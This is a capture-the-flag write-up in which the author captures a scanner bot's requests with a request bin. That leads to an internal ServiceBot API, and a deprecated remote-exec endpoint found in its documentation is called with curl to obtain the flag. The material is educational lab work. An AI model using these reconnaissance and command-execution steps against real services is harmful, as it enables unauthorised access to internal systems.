Customer Service


problem description


We enter the attached website, and together with some marketing material, there's a link to try the scanner:

<br>Go Ahead and Try <a href="" target="_blank">NOW</a>.

This in fact is a telegram bot.

We're asked to provide a URL to a verification file in order to start the scan. We can use a request bin for this, in order to be able to inspect the scanner access.

A few seconds later, we get a hit in the request bin:

accept: application/json, text/plain, */*
user-agent: ServiceBot/1.0
x-sent-by: ServiceBot/1.0
connection: keep-alive

The api-method seems interesting, let's visit it:

root@kali:/media/sf_CTFs/appsec/Customer_Service# curl
{"msg":"scan waiting for bot vertification.","status":200}

Traveling up the URI, we find the following content:

root@kali:/media/sf_CTFs/appsec/Customer_Service# curl
Welcome to ServiceBot server. Please checkout <a href=/v1/internal/bot/docs>documention</a> for development.

Let's visit the documentation:

The deprecated /internal/bot/api/assets/exec API catches the eye. There's even a button to try it out.

We execute the command according to the documentation and get the flag:

root@kali:/media/sf_CTFs/appsec/Customer_Service# curl -X POST "" -H  "accept: application/json" -H  "Content-Type: application/json" -d "{  \"cmd\": \"string\"}"
{"msg":"Congrats! Your flag: AppSec-IL{B0t_Do3nt_M34n_S3cure_A7i}","status":200}